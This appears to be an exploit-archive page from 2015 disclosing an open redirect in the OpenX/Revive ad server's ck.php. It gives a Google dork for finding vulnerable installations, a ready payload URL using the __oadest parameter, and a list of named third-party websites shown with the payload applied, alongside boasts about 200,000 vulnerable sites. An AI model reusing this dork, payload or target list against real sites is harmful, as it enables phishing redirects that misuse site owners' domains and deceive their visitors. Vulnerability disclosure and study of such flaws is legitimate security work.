OpenX - Revive Oped Redirect Vulnerability

2015.08.15

Credit: R3NW4

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-601

Dork: inurl:\"ck.php?oaparams=\"

# Exploit Title: [OpenX - Revive Oped Redirect Vulnerability]
# Google Dorks: [inurl:"ck.php?oaparams="]
# Date: [15-8-2015]
# Exploit Author: [R3NW4]
# Platform: (WebApps)
# Version: [ all ]
# Greetz: MuhmadEmad - All Kurdish Hackers

-----------------------

Vulnerable file:ck.php

Exploit:

site.com/path/www/delivery/ck.php?__oadest=https://www.google.com/

there is more than 200,000 vulnerable websites.

don't work on websites that have Mod_Security :(

-------------------------

DemoZ:

www.pcnet.cXom.tr/revive/www/delivery/ck.php?__oadest=https://www.google.com/

www.times.neXt.nz/openx/www/delivery/ck.php?__oadest=https://www.google.com/

http://www.cybXersax.de/openx/delivery/ck.php?__oadest=https://www.google.com/

http://www.fuXturetv-lebanon.com/adserver/www/delivery/ck.php?__oadest=https://www.google.com/

www.alwasaXtnews.com/ads/ck.php?__oadest=https://www.google.com/

------------------------

# https://twitter.com/R3NW4

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

OpenX - Revive Oped Redirect Vulnerability

Dork: inurl:\"ck.php?oaparams=\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.